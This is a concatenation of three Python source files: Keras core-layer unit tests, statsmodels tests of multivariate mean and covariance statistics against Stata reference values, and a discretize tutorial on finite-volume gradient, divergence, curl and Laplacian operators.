# While it is generally not advised to mix Variables with Lambda layers, if
# the variables are explicitly set as attributes then they are still
# tracked. This is consistent with the base Layer behavior.
layer = keras.layers.Lambda(lambda_fn, arguments={'v': v})
self.assertLen(layer.trainable_weights, 0)
layer.v = v
self.assertLen(layer.trainable_weights, 1)
model = testing_utils.get_model_from_layers([layer], input_shape=(10,))
model.compile(
keras.optimizer_v2.gradient_descent.SGD(0.1),
'mae',
run_eagerly=testing_utils.should_run_eagerly())
x, y = np.ones((10, 10), 'float32'), 2 * np.ones((10, 10), 'float32')
model.fit(x, y, batch_size=2, epochs=2, validation_data=(x, y))
self.assertLen(model.trainable_weights, 1)
self.assertAllClose(keras.backend.get_value(model.trainable_weights[0]), 2.)
@keras_parameterized.run_all_keras_modes
@keras_parameterized.run_with_all_model_types
def test_creation_inside_lambda(self):
def lambda_fn(x):
scale = variables.Variable(1., trainable=True, name='scale')
shift = variables.Variable(1., trainable=True, name='shift')
return x * scale + shift
expected_error = textwrap.dedent(r'''
( )?The following Variables were created within a Lambda layer \(shift_and_scale\)
( )?but are not tracked by said layer:
( )? <tf.Variable \'.*shift_and_scale/scale:0\'.+
( )? <tf.Variable \'.*shift_and_scale/shift:0\'.+
( )?The layer cannot safely ensure proper Variable reuse.+''')
with self.assertRaisesRegex(ValueError, expected_error):
layer = keras.layers.Lambda(lambda_fn, name='shift_and_scale')
model = testing_utils.get_model_from_layers([layer], input_shape=(1,))
model(array_ops.ones((4, 1)))
@keras_parameterized.run_all_keras_modes
@keras_parameterized.run_with_all_model_types
def test_transitive_variable_creation(self):
dense = keras.layers.Dense(1, use_bias=False, kernel_initializer='ones')
def bad_lambda_fn(x):
return dense(x + 1) # Dense layer is built on first call
expected_error = textwrap.dedent(r'''
( )?The following Variables were created within a Lambda layer \(bias_dense\)
( )?but are not tracked by said layer:
( )? <tf.Variable \'.*bias_dense/dense/kernel:0\'.+
( )?The layer cannot safely ensure proper Variable reuse.+''')
with self.assertRaisesRegex(ValueError, expected_error):
layer = keras.layers.Lambda(bad_lambda_fn, name='bias_dense')
model = testing_utils.get_model_from_layers([layer], input_shape=(1,))
model(array_ops.ones((4, 1)))
@keras_parameterized.run_all_keras_modes
@keras_parameterized.run_with_all_model_types
def test_warns_on_variable_capture(self):
v = variables.Variable(1., trainable=True)
def lambda_fn(x):
return x * v
expected_warning = textwrap.dedent(r'''
( )?The following Variables were used a Lambda layer\'s call \(lambda\), but
( )?are not present in its tracked objects:
( )? <tf.Variable \'.*Variable:0\'.+
( )?It is possible that this is intended behavior.+''')
layer = keras.layers.Lambda(lambda_fn)
def patched_warn(msg):
raise ValueError(msg)
layer._warn = patched_warn
with self.assertRaisesRegex(ValueError, expected_warning):
model = testing_utils.get_model_from_layers([layer], input_shape=(1,))
model(array_ops.ones((4, 1)))
@keras_parameterized.run_all_keras_modes
class CoreLayersTest(keras_parameterized.TestCase):
def test_masking(self):
testing_utils.layer_test(
keras.layers.Masking, kwargs={}, input_shape=(3, 2, 3))
def test_keras_mask(self):
x = np.ones((10, 10))
y = keras.layers.Masking(1.)(x)
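    # Masking(1.) marks timesteps whose features all equal the mask value, so
    # an all-ones input yields an all-zero (fully masked) mask.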
self.assertTrue(hasattr(y, '_keras_mask'))
self.assertTrue(y._keras_mask is not None)
self.assertAllClose(self.evaluate(y._keras_mask), np.zeros((10,)))
def test_compute_mask_with_positional_mask_arg(self):
class MyLayer(keras.layers.Layer):
def call(self, inputs, mask=None):
return inputs
def compute_mask(self, inputs, mask=None):
if mask is not None:
return array_ops.ones(())
else:
return array_ops.zeros(())
x, mask = array_ops.ones((1, 1)), array_ops.ones((1, 1))
layer = MyLayer()
y = layer(x, mask)
# Check that `mask` was correctly sent to `compute_mask`.
self.assertEqual(keras.backend.get_value(y._keras_mask), 1)
def test_activation(self):
# with string argument
testing_utils.layer_test(
keras.layers.Activation,
kwargs={'activation': 'relu'},
input_shape=(3, 2))
# with function argument
testing_utils.layer_test(
keras.layers.Activation,
kwargs={'activation': keras.backend.relu},
input_shape=(3, 2))
def test_reshape(self):
testing_utils.layer_test(
keras.layers.Reshape,
kwargs={'target_shape': (8, 1)},
input_shape=(3, 2, 4))
testing_utils.layer_test(
keras.layers.Reshape,
kwargs={'target_shape': (-1, 1)},
input_shape=(3, 2, 4))
testing_utils.layer_test(
keras.layers.Reshape,
kwargs={'target_shape': (1, -1)},
input_shape=(3, 2, 4))
testing_utils.layer_test(
keras.layers.Reshape,
kwargs={'target_shape': (-1, 1)},
input_shape=(None, None, 2))
def test_reshape_set_static_shape(self):
input_layer = keras.Input(batch_shape=(1, None))
reshaped = keras.layers.Reshape((1, 100))(input_layer)
# Make sure the batch dim is not lost after array_ops.reshape.
self.assertEqual(reshaped.shape, [1, 1, 100])
def test_permute(self):
testing_utils.layer_test(
keras.layers.Permute, kwargs={'dims': (2, 1)}, input_shape=(3, 2, 4))
def test_permute_errors_on_invalid_starting_dims_index(self):
with self.assertRaisesRegex(ValueError, r'Invalid permutation .*dims.*'):
testing_utils.layer_test(
keras.layers.Permute,
kwargs={'dims': (0, 1, 2)}, input_shape=(3, 2, 4))
def test_permute_errors_on_invalid_set_of_dims_indices(self):
with self.assertRaisesRegex(ValueError, r'Invalid permutation .*dims.*'):
testing_utils.layer_test(
keras.layers.Permute,
kwargs={'dims': (1, 4, 2)}, input_shape=(3, 2, 4))
def test_flatten(self):
testing_utils.layer_test(
keras.layers.Flatten, kwargs={}, input_shape=(3, 2, 4))
# Test channels_first
inputs = np.random.random((10, 3, 5, 5)).astype('float32')
outputs = testing_utils.layer_test(
keras.layers.Flatten,
kwargs={'data_format': 'channels_first'},
input_data=inputs)
target_outputs = np.reshape(
np.transpose(inputs, (0, 2, 3, 1)), (-1, 5 * 5 * 3))
self.assertAllClose(outputs, target_outputs)
def test_flatten_scalar_channels(self):
testing_utils.layer_test(
keras.layers.Flatten, kwargs={}, input_shape=(3,))
# Test channels_first
inputs = np.random.random((10,)).astype('float32')
outputs = testing_utils.layer_test(
keras.layers.Flatten,
kwargs={'data_format': 'channels_first'},
input_data=inputs)
target_outputs = np.expand_dims(inputs, -1)
self.assertAllClose(outputs, target_outputs)
def test_repeat_vector(self):
testing_utils.layer_test(
keras.layers.RepeatVector, kwargs={'n': 3}, input_shape=(3, 2))
def test_dense(self):
testing_utils.layer_test(
keras.layers.Dense, kwargs={'units': 3}, input_shape=(3, 2))
testing_utils.layer_test(
keras.layers.Dense, kwargs={'units': 3}, input_shape=(3, 4, 2))
testing_utils.layer_test(
keras.layers.Dense, kwargs={'units': 3}, input_shape=(None, None, 2))
testing_utils.layer_test(
keras.layers.Dense, kwargs={'units': 3}, input_shape=(3, 4, 5, 2))
def test_dense_output(self):
dense_inputs = ops.convert_to_tensor_v2_with_dispatch(
np.random.uniform(size=(10, 10)).astype('f'))
# Create some sparse data where multiple rows and columns are missing.
sparse_inputs = sparse_tensor.SparseTensor(
indices=np.random.randint(low=0, high=10, size=(5, 2)),
values=np.random.uniform(size=(5,)).astype('f'),
dense_shape=[10, 10])
sparse_inputs = sparse_ops.sparse_reorder(sparse_inputs)
layer = keras.layers.Dense(
5,
kernel_initializer=keras.initializers.RandomUniform(),
bias_initializer=keras.initializers.RandomUniform(),
dtype='float32')
dense_outputs = layer(dense_inputs)
    sparse_outputs = layer(sparse_inputs)
expected_dense = math_ops.add(
math_ops.matmul(dense_inputs, keras.backend.get_value(layer.kernel)),
keras.backend.get_value(layer.bias))
expected_sparse = math_ops.add(
math_ops.matmul(
sparse_ops.sparse_tensor_to_dense(sparse_inputs),
keras.backend.get_value(layer.kernel)),
keras.backend.get_value(layer.bias))
self.assertAllClose(dense_outputs, expected_dense)
    self.assertAllClose(sparse_outputs, expected_sparse)
def test_dense_dtype(self):
inputs = ops.convert_to_tensor_v2_with_dispatch(
np.random.randint(low=0, high=7, size=(2, 2)))
layer = keras.layers.Dense(5, dtype='float32')
outputs = layer(inputs)
self.assertEqual(outputs.dtype, 'float32')
def test_dense_with_policy(self):
inputs = ops.convert_to_tensor_v2_with_dispatch(
np.random.randint(low=0, high=7, size=(2, 2)))
layer = keras.layers.Dense(5, dtype=policy.Policy('mixed_float16'))
outputs = layer(inputs)
output_signature = layer.compute_output_signature(
tensor_spec.TensorSpec(dtype='float16', shape=(2, 2)))
self.assertEqual(output_signature.dtype, dtypes.float16)
self.assertEqual(output_signature.shape, (2, 5))
self.assertEqual(outputs.dtype, 'float16')
self.assertEqual(layer.kernel.dtype, 'float32')
def test_dense_regularization(self):
layer = keras.layers.Dense(
3,
kernel_regularizer=keras.regularizers.l1(0.01),
bias_regularizer='l1',
activity_regularizer='l2',
name='dense_reg')
layer(keras.backend.variable(np.ones((2, 4))))
self.assertEqual(3, len(layer.losses))
def test_dense_constraints(self):
k_constraint = keras.constraints.max_norm(0.01)
b_constraint = keras.constraints.max_norm(0.01)
layer = keras.layers.Dense(
3, kernel_constraint=k_constraint, bias_constraint=b_constraint)
layer(keras.backend.variable(np.ones((2, 4))))
self.assertEqual(layer.kernel.constraint, k_constraint)
self.assertEqual(layer.bias.constraint, b_constraint)
def test_activity_regularization(self):
layer = keras.layers.ActivityRegularization(l1=0.1)
layer(keras.backend.variable(np.ones((2, 4))))
self.assertEqual(1, len(layer.losses))
config = layer.get_config()
self.assertEqual(config.pop('l1'), 0.1)
def test_numpy_inputs(self):
if context.executing_eagerly():
layer = keras.layers.RepeatVector(2)
x = np.ones((10, 10))
self.assertAllEqual(np.ones((10, 2, 10)), layer(x))
layer = keras.layers.Concatenate()
x, y = np.ones((10, 10)), np.ones((10, 10))
self.assertAllEqual(np.ones((10, 20)), layer([x, y]))
@keras_parameterized.run_all_keras_modes
class TFOpLambdaTest(keras_parameterized.TestCase):
def test_non_tf_symbol(self):
def dummy_func(a, b):
return a + b
layer = core.TFOpLambda(dummy_func)
self.assertIsNone(layer.symbol)
self.assertEqual(layer.name, 'dummy_func')
with self.assertRaisesRegex(ValueError, 'was generated from .*dummy_func'):
layer.get_config()
if __name__ == '__main__':
test.main()
|
|
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 5 14:48:19 2017
Author: Josef Perktold
"""
import numpy as np
from numpy.testing import assert_allclose, assert_equal #noqa
from statsmodels.stats import weightstats
import statsmodels.stats.multivariate as smmv # pytest cannot import test_xxx
from statsmodels.stats.multivariate import confint_mvmean_fromstats
from statsmodels.tools.testing import Holder
def test_mv_mean():
# names = ['id', 'mpg1', 'mpg2', 'add']
x = np.asarray([[1.0, 24.0, 23.5, 1.0],
[2.0, 25.0, 24.5, 1.0],
[3.0, 21.0, 20.5, 1.0],
[4.0, 22.0, 20.5, 1.0],
[5.0, 23.0, 22.5, 1.0],
[6.0, 18.0, 16.5, 1.0],
[7.0, 17.0, 16.5, 1.0],
[8.0, 28.0, 27.5, 1.0],
[9.0, 24.0, 23.5, 1.0],
[10.0, 27.0, 25.5, 1.0],
[11.0, 21.0, 20.5, 1.0],
[12.0, 23.0, 22.5, 1.0],
[1.0, 20.0, 19.0, 0.0],
[2.0, 23.0, 22.0, 0.0],
[3.0, 21.0, 20.0, 0.0],
[4.0, 25.0, 24.0, 0.0],
[5.0, 18.0, 17.0, 0.0],
[6.0, 17.0, 16.0, 0.0],
[7.0, 18.0, 17.0, 0.0],
[8.0, 24.0, 23.0, 0.0],
[9.0, 20.0, 19.0, 0.0],
[10.0, 24.0, 22.0, 0.0],
[11.0, 23.0, 22.0, 0.0],
[12.0, 19.0, 18.0, 0.0]])
res = smmv.test_mvmean(x[:, 1:3], [21, 21])
res_stata = Holder(p_F=1.25062334808e-09,
df_r=22,
df_m=2,
F=59.91609589041116,
T2=125.2791095890415)
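    # Stata reports Hotelling's T2; the F statistic follows from
    # F = (n - p) / (p * (n - 1)) * T2 with n = 24 observations and p = 2.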
assert_allclose(res.statistic, res_stata.F, rtol=1e-10)
assert_allclose(res.pvalue, res_stata.p_F, rtol=1e-10)
assert_allclose(res.t2, res_stata.T2, rtol=1e-10)
assert_equal(res.df, [res_stata.df_m, res_stata.df_r])
# diff of paired sample
mask = x[:, -1] == 1
x1 = x[mask, 1:3]
x0 = x[~mask, 1:3]
res_p = smmv.test_mvmean(x1 - x0, [0, 0])
# result Stata hotelling
res_stata = Holder(T2=9.698067632850247,
df=10,
k=2,
N=12,
F=4.4082126, # not in return List
p_F=0.0424) # not in return List
res = res_p
assert_allclose(res.statistic, res_stata.F, atol=5e-7)
assert_allclose(res.pvalue, res_stata.p_F, atol=5e-4)
assert_allclose(res.t2, res_stata.T2, rtol=1e-10)
assert_equal(res.df, [res_stata.k, res_stata.df])
# mvtest means diff1 diff2, zero
res_stata = Holder(p_F=.0423949782937231,
df_r=10,
df_m=2,
F=4.408212560386478,
T2=9.69806763285025)
assert_allclose(res.statistic, res_stata.F, rtol=1e-12)
assert_allclose(res.pvalue, res_stata.p_F, rtol=1e-12)
assert_allclose(res.t2, res_stata.T2, rtol=1e-12)
assert_equal(res.df, [res_stata.df_m, res_stata.df_r])
dw = weightstats.DescrStatsW(x)
ci0 = dw.tconfint_mean(alpha=0.05)
nobs = len(x[:, 1:])
ci1 = confint_mvmean_fromstats(dw.mean, np.diag(dw.var), nobs,
lin_transf=np.eye(4), alpha=0.05)
ci2 = confint_mvmean_fromstats(dw.mean, dw.cov, nobs,
lin_transf=np.eye(4), alpha=0.05)
assert_allclose(ci1[:2], ci0, rtol=1e-13)
assert_allclose(ci2[:2], ci0, rtol=1e-13)
# test from data
res = smmv.confint_mvmean(x, lin_transf=np.eye(4), alpha=0.05)
assert_allclose(res, ci2, rtol=1e-13)
def test_mvmean_2indep():
x = np.asarray([[1.0, 24.0, 23.5, 1.0],
[2.0, 25.0, 24.5, 1.0],
[3.0, 21.0, 20.5, 1.0],
[4.0, 22.0, 20.5, 1.0],
[5.0, 23.0, 22.5, 1.0],
[6.0, 18.0, 16.5, 1.0],
[7.0, 17.0, 16.5, 1.0],
[8.0, 28.0, 27.5, 1.0],
[9.0, 24.0, 23.5, 1.0],
[10.0, 27.0, 25.5, 1.0],
[11.0, 21.0, 20.5, 1.0],
[12.0, 23.0, 22.5, 1.0],
[1.0, 20.0, 19.0, 0.0],
[2.0, 23.0, 22.0, 0.0],
[3.0, 21.0, 20.0, 0.0],
[4.0, 25.0, 24.0, 0.0],
[5.0, 18.0, 17.0, 0.0],
[6.0, 17.0, 16.0, 0.0],
[7.0, 18.0, 17.0, 0.0],
[8.0, 24.0, 23.0, 0.0],
[9.0, 20.0, 19.0, 0.0],
[10.0, 24.0, 22.0, 0.0],
[11.0, 23.0, 22.0, 0.0],
[12.0, 19.0, 18.0, 0.0]])
y = np.asarray([[1.1, 24.1, 23.4, 1.1],
[1.9, 25.2, 24.3, 1.2],
[3.2, 20.9, 20.2, 1.3],
[4.1, 21.8, 20.6, 0.9],
[5.2, 23.0, 22.7, 0.8],
[6.3, 18.1, 16.8, 0.7],
[7.1, 17.2, 16.5, 1.0],
[7.8, 28.3, 27.4, 1.1],
[9.5, 23.9, 23.3, 1.2],
[10.1, 26.8, 25.2, 1.3],
[10.5, 26.7, 20.6, 0.9],
[12.1, 23.0, 22.7, 0.8],
[1.1, 20.1, 19.0, 0.7],
[1.8, 23.2, 22.0, 0.1],
[3.2, 21.3, 20.3, 0.2],
[4.3, 24.9, 24.2, 0.3],
[5.5, 17.9, 17.1, 0.0],
[5.5, 17.8, 16.0, 0.6],
[7.1, 17.7, 16.7, 0.0],
[7.7, 24.0, 22.8, 0.5],
[9.1, 20.1, 18.9, 0.0],
[10.2, 24.2, 22.3, 0.3],
[11.3, 23.3, 22.2, 0.0],
[11.7, 18.8, 18.1, 0.1]])
res = smmv.test_mvmean_2indep(x, y)
res_stata = Holder(p_F=0.6686659171701677,
df_r=43,
df_m=4,
F=0.594263378678938,
T2=2.5428944576028973)
assert_allclose(res.statistic, res_stata.F, rtol=1e-10)
assert_allclose(res.pvalue, res_stata.p_F, rtol=1e-10)
assert_allclose(res.t2, res_stata.T2, rtol=1e-10)
assert_equal(res.df, [res_stata.df_m, res_stata.df_r])
def test_confint_simult():
# example from book for simultaneous confint
m = [526.29, 54.69, 25.13]
cov = [[5808.06, 597.84, 222.03],
[597.84, 126.05, 23.39],
[222.03, 23.39, 23.11]]
nobs = 87
res_ci = confint_mvmean_fromstats(m, cov, nobs, lin_transf=np.eye(3),
simult=True)
cii = [confint_mvmean_fromstats(
m, cov, nobs, lin_transf=np.eye(3)[i], simult=True)[:2]
for i in range(3)]
cii = np.array(cii).squeeze()
# these might use rounded numbers in intermediate computation
res_ci_book = np.array([[503.06, 550.12], [51.22, 58.16], [23.65, 26.61]])
assert_allclose(res_ci[0], res_ci_book[:, 0], rtol=1e-3) # low
    assert_allclose(res_ci[1], res_ci_book[:, 1], rtol=1e-3)  # upp
assert_allclose(res_ci[0], cii[:, 0], rtol=1e-13)
assert_allclose(res_ci[1], cii[:, 1], rtol=1e-13)
res_constr = confint_mvmean_fromstats(m, cov, nobs, lin_transf=[0, 1, -1],
simult=True)
assert_allclose(res_constr[0], 29.56 - 3.12, rtol=1e-3)
assert_allclose(res_constr[1], 29.56 + 3.12, rtol=1e-3)
# TODO: this assumes separate constraints,
# but we want multiplicity correction
# test if several constraints or transformations work
# original, flipping sign, multiply by 2
lt = [[0, 1, -1], [0, -1, 1], [0, 2, -2]]
res_constr2 = confint_mvmean_fromstats(m, cov, nobs, lin_transf=lt,
simult=True)
lows = res_constr[0], - res_constr[1], 2 * res_constr[0]
upps = res_constr[1], - res_constr[0], 2 * res_constr[1]
# TODO: check return dimensions
lows = np.asarray(lows).squeeze()
upps = np.asarray(upps).squeeze()
assert_allclose(res_constr2[0], lows, rtol=1e-13)
assert_allclose(res_constr2[1], upps, rtol=1e-13)
class TestCovStructure(object):
@classmethod
def setup_class(cls):
# computed from data with ``cov = np.cov(dta1, rowvar=0, ddof=1)``
cls.cov = np.array(
[[28.965925000000002, 17.215358333333327, 2.6945666666666654],
[17.215358333333327, 21.452852666666672, 6.044527833333332],
[2.6945666666666654, 6.044527833333332, 13.599042333333331]])
cls.nobs = 25
def test_spherical(self):
cov, nobs = self.cov, self.nobs
# from Stata 14
p_chi2 = 0.0006422366870356
# df = 5
chi2 = 21.53275509455011
stat, pv = smmv.test_cov_spherical(cov, nobs)
assert_allclose(stat, chi2, rtol=1e-7)
assert_allclose(pv, p_chi2, rtol=1e-6)
def test_diagonal(self):
cov, nobs = self.cov, self.nobs
# from Stata 14
p_chi2 = 0.0004589987613319
# df = 3
chi2 = 17.91025335733012
stat, pv = smmv.test_cov_diagonal(cov, nobs)
assert_allclose(stat, chi2, rtol=1e-8)
assert_allclose(pv, p_chi2, rtol=1e-7)
def test_blockdiagonal(self):
cov, nobs = self.cov, self.nobs
# from Stata 14
p_chi2 = 0.1721758850671037
# df = 2
chi2 = 3.518477474111563
# cov_blocks = cov[:2, :2], cov[-1:, -1:]
# stat, pv = smmv.test_cov_blockdiagonal(cov, nobs, cov_blocks)
block_len = [2, 1]
stat, pv = smmv.test_cov_blockdiagonal(cov, nobs, block_len)
assert_allclose(stat, chi2, rtol=1e-7)
assert_allclose(pv, p_chi2, rtol=1e-6)
def test_covmat(self):
cov, nobs = self.cov, self.nobs
# from Stata 14
p_chi2 = 0.4837049015162541
# df = 6
chi2 = 5.481422374989864
cov_null = np.array([[30, 15, 0], [15, 20, 0], [0, 0, 10]])
stat, pv = smmv.test_cov(cov, nobs, cov_null)
assert_allclose(stat, chi2, rtol=1e-7)
assert_allclose(pv, p_chi2, rtol=1e-6)
def test_cov_oneway():
# from Stata 14
p_chi2 = .1944866419800838
chi2 = 13.55075120374669
df = 10
p_F_Box = .1949865290585139
df_r_Box = 18377.68924302788
df_m_Box = 10
F_Box = 1.354282822767436
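    # Reference values from Stata for Box's M test of equal covariance
    # matrices; both the chi-squared and the F approximation are checked.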
nobs = [32, 32]
cov_m = np.array(
[[5.192540322580645, 4.545362903225806, 6.522177419354839, 5.25],
[4.545362903225806, 13.184475806451612, 6.76008064516129,
6.266129032258064],
[6.522177419354839, 6.76008064516129, 28.673387096774192,
14.46774193548387],
[5.25, 6.266129032258064, 14.46774193548387, 16.64516129032258]])
cov_f = np.array(
[[9.13608870967742, 7.549395161290322, 4.86391129032258,
4.151209677419355],
[7.549395161290322, 18.60383064516129, 10.224798387096774,
5.445564516129032],
[4.86391129032258, 10.224798387096774, 30.039314516129032,
13.493951612903226],
[4.151209677419355, 5.445564516129032, 13.493951612903226,
27.995967741935484]])
res = smmv.test_cov_oneway([cov_m, cov_f], nobs)
stat, pv = res
assert_allclose(stat, F_Box, rtol=1e-10)
assert_allclose(pv, p_F_Box, rtol=1e-6)
assert_allclose(res.statistic_f, F_Box, rtol=1e-10)
assert_allclose(res.pvalue_f, p_F_Box, rtol=1e-6)
assert_allclose(res.df_f, (df_m_Box, df_r_Box), rtol=1e-13)
assert_allclose(res.statistic_chi2, chi2, rtol=1e-10)
assert_allclose(res.pvalue_chi2, p_chi2, rtol=1e-6)
assert_equal(res.df_chi2, df)
|
|
# -*- coding: utf-8 -*-
"""
Differential Operators
======================
When solving PDEs using the finite volume approach, inner products may
contain differential operators. Where :math:`\\psi` and :math:`\\phi` are
scalar quantities, and :math:`\\vec{u}` and :math:`\\vec{v}` are vector
quantities, we may need to derive a discrete approximation for the following
inner products:
1. :math:`(\\vec{u} , \\nabla \\phi)`
2. :math:`(\\psi , \\nabla \\cdot \\vec{v})`
3. :math:`(\\vec{u} , \\nabla \\times \\vec{v})`
4. :math:`(\\psi, \\Delta^2 \\phi)`
In this section, we demonstrate how to go from the inner product to the
discrete approximation for each case. In doing so, we must construct
discrete differential operators and inner product matrices, and consider
boundary conditions.
"""
####################################################
#
# Import Packages
# ---------------
#
# Here we import the packages required for this tutorial
#
from discretize.utils import sdiag
from discretize import TensorMesh
import numpy as np
import matplotlib.pyplot as plt
#####################################################
# Gradient
# --------
#
# Where :math:`\phi` is a scalar quantity and :math:`\vec{u}` is a vector
# quantity, we would like to evaluate the following inner product:
#
# .. math::
# (\vec{u} , \nabla \phi) = \int_\Omega \vec{u} \cdot \nabla \phi \, dv
#
# **Inner Product at edges:**
#
# In the case that :math:`\vec{u}` represents a field, it is natural for it to
# be discretized to live on cell edges. By defining :math:`\phi` to live at
# the nodes, we can use the nodal gradient operator (:math:`\mathbf{G_n}`) to
# map from nodes to edges. The inner product is therefore computed using an
# inner product matrix (:math:`\mathbf{M_e}`) for
# quantities living on cell edges, e.g.:
#
# .. math::
# (\vec{u} , \nabla \phi) \approx \mathbf{u^T M_e G_n \phi}
#
# **Inner Product at faces:**
#
# In the case that :math:`\vec{u}` represents a flux, it is natural for it to
# be discretized to live on cell faces. By defining :math:`\phi` to live at
# cell centers, we can use the cell gradient operator (:math:`\mathbf{G_c}`) to
# map from centers to faces. In this case, we must impose boundary conditions
# on the discrete gradient operator because it cannot use locations outside
# the mesh to evaluate the gradient on the boundary. If done correctly, the
# inner product is computed using an inner product matrix (:math:`\mathbf{M_f}`)
# for quantities living on cell faces, e.g.:
#
# .. math::
# (\vec{u} , \nabla \phi) \approx \mathbf{u^T M_f G_c \phi}
#
# Make basic mesh
h = np.ones(10)
mesh = TensorMesh([h, h, h])
# Items required to perform u.T*(Me*Gn*phi)
Me = mesh.getEdgeInnerProduct() # Basic inner product matrix (edges)
Gn = mesh.nodalGrad # Nodes to edges gradient
# Items required to perform u.T*(Mf*Gc*phi)
Mf = mesh.getFaceInnerProduct() # Basic inner product matrix (faces)
mesh.setCellGradBC(["neumann", "dirichlet", "neumann"]) # Set boundary conditions
Gc = mesh.cellGrad # Cells to faces gradient
# Plot Sparse Representation
fig = plt.figure(figsize=(5, 6))
ax1 = fig.add_subplot(121)
ax1.spy(Me * Gn, markersize=0.5)
ax1.set_title("Me*Gn")
ax2 = fig.add_subplot(122)
ax2.spy(Mf * Gc, markersize=0.5)
ax2.set_title("Mf*Gc")
#####################################################
# Divergence
# ----------
#
# Where :math:`\psi` is a scalar quantity and :math:`\vec{v}` is a vector
# quantity, we would like to evaluate the following inner product:
#
# .. math::
# (\psi , \nabla \cdot \vec{v}) = \int_\Omega \psi \nabla \cdot \vec{v} \, dv
#
# The divergence defines a measure of the flux leaving/entering a volume. As a
# result, it is natural for :math:`\vec{v}` to be a flux defined on cell faces.
# The face divergence operator (:math:`\mathbf{D}`) maps from cell faces to
# cell centers; therefore, we should define :math:`\psi` at cell centers. The
# inner product is ultimately computed using an inner product matrix
# (:math:`\mathbf{M_f}`) for quantities living on cell faces, e.g.:
#
# .. math::
# (\psi , \nabla \cdot \vec{v}) \approx \mathbf{\psi^T} \textrm{diag} (\mathbf{vol} ) \mathbf{D v}
#
# Make basic mesh
h = np.ones(10)
mesh = TensorMesh([h, h, h])
# Items required to perform psi.T*(Mc*D*v)
Mc = sdiag(mesh.vol) # Basic inner product matrix (centers)
D = mesh.faceDiv # Faces to centers divergence
# Plot sparse representation
fig = plt.figure(figsize=(8, 5))
ax1 = fig.add_subplot(111)
ax1.spy(Mc * D, markersize=0.5)
ax1.set_title("Mc*D", pad=20)
#####################################################
# Curl
# ----
#
# Where :math:`\vec{u}` and :math:`\vec{v}` are vector quantities, we would
# like to evaluate the following inner product:
#
# .. math::
#     (\vec{u} , \nabla \times \vec{v}) = \int_\Omega \vec{u} \cdot (\nabla \times \vec{v}) \, dv
#
# **Inner Product at Faces:**
#
# Let :math:`\vec{u}` denote a flux and let :math:`\vec{v}` denote a field.
# In this case, it is natural for the flux :math:`\vec{u}` to live on cell
# faces and for the field :math:`\vec{v}` to live on cell edges. The discrete
# curl operator (:math:`\mathbf{C_e}`) in this case naturally maps from cell
# edges to cell faces without the need to define boundary conditions. The
# inner product can be approximated using an inner product matrix
# (:math:`\mathbf{M_f}`) for quantities living on cell faces, e.g.:
#
# .. math::
# (\vec{u} , \nabla \times \vec{v}) \approx \mathbf{u^T M_f C_e v}
#
# **Inner Product at Edges:**
#
# Now let :math:`\vec{u}` denote a field and let :math:`\vec{v}` denote a flux.
# In this case, it is natural for :math:`\vec{u}` to live on cell edges
# and for :math:`\vec{v}` to live on cell faces. We would like to compute the
# inner product using an inner product matrix (:math:`\mathbf{M_e}`) for
# quantities living on cell edges. However, this requires a discrete curl
# operator (:math:`\mathbf{C_f}`) that maps from cell faces
# to cell edges, which requires us to impose boundary conditions on the operator.
# If done successfully:
#
# .. math::
# (\vec{u} , \nabla \times \vec{v}) \approx \mathbf{u^T M_e C_f v}
#
# Make basic mesh
h = np.ones(10)
mesh = TensorMesh([h, h, h])
# Items required to perform u.T*(Mf*Ce*v)
Mf = mesh.getFaceInnerProduct() # Basic inner product matrix (faces)
Ce = mesh.edgeCurl # Edges to faces curl
# Items required to perform u.T*(Me*Cf*v)
Me = mesh.getEdgeInnerProduct() # Basic inner product matrix (edges)
Cf = mesh.edgeCurl.T # Faces to edges curl (assumes Dirichlet)
# Plot Sparse Representation
fig = plt.figure(figsize=(9, 5))
ax1 = fig.add_subplot(121)
ax1.spy(Mf * Ce, markersize=0.5)
ax1.set_title("Mf*Ce", pad=10)
ax2 = fig.add_subplot(122)
ax2.spy(Me * Cf, markersize=0.5)
ax2.set_title("Me*Cf", pad=10)
###########################################################
# Scalar Laplacian
# ----------------
#
# Where :math:`\psi` and :math:`\phi` are scalar quantities, and the scalar
# Laplacian :math:`\Delta^2 = \nabla \cdot \nabla`, we would like to
# approximate the following inner product:
#
# .. math::
# (\psi , \nabla \cdot \nabla \phi) = \int_\Omega \psi (\nabla \cdot \nabla \phi) \, dv
#
# Using :math:`p \nabla \cdot \mathbf{q} = \nabla \cdot (p \mathbf{q}) - \mathbf{q} \cdot (\nabla p )`
# and the Divergence theorem we obtain:
#
# .. math::
#     (\psi , \nabla \cdot \nabla \phi) = \int_{\partial \Omega} \mathbf{n} \cdot ( \psi \nabla \phi ) \, da
#     - \int_\Omega (\nabla \psi ) \cdot (\nabla \phi ) \, dv
#
# In this case, the surface integral can be eliminated if we can assume a
# Neumann condition of :math:`\partial \phi/\partial n = 0` on the boundary.
#
# **Inner Product at Edges:**
#
# Let :math:`\psi` and :math:`\phi` be discretized to the nodes. In this case,
# the discrete gradient operator (:math:`\mathbf{G_n}`) must map from nodes
# to edges. Ultimately we evaluate the inner product using an inner product
# matrix (:math:`\mathbf{M_e}`) for quantities living on cell edges, e.g.:
#
# .. math::
#     (\psi , \nabla \cdot \nabla \phi) \approx \mathbf{\psi^T G_n^T M_e G_n \phi}
#
# **Inner Product at Faces:**
#
# Let :math:`\psi` and :math:`\phi` be discretized to cell centers. In this
# case, the discrete gradient operator (:math:`\mathbf{G_c}`) must map from
# centers to faces; and requires the user to set Neumann conditions in the
# operator. Ultimately we evaluate the inner product using an inner product
# matrix (:math:`\mathbf{M_f}`) for quantities living on cell faces, e.g.:
#
# .. math::
#     (\psi , \nabla \cdot \nabla \phi) \approx \mathbf{\psi^T G_c^T M_f G_c \phi}
#
#
# Make basic mesh
h = np.ones(10)
mesh = TensorMesh([h, h, h])
# Items required to perform psi.T*(Gn.T*Me*Gn*phi)
Me = mesh.getEdgeInnerProduct() # Basic inner product matrix (edges)
Gn = mesh.nodalGrad # Nodes to edges gradient
# Items required to perform psi.T*(Gc.T*Mf*Gc*phi)
Mf = mesh.getFaceInnerProduct() # Basic inner product matrix (faces)
mesh.setCellGradBC(["dirichlet", "dirichlet", "dirichlet"])
Gc = mesh.cellGrad # Centers to faces gradient
# Plot Sparse Representation
fig = plt.figure(figsize=(9, 4))
ax1 = fig.add_subplot(121)
ax1.spy(Gn.T * Me * Gn, markersize=0.5)
ax1.set_title("Gn.T*Me*Gn", pad=5)
ax2 = fig.add_subplot(122)
ax2.spy(Gc.T * Mf * Gc, markersize=0.5)
ax2.set_title("Gc.T*Mf*Gc", pad=5)
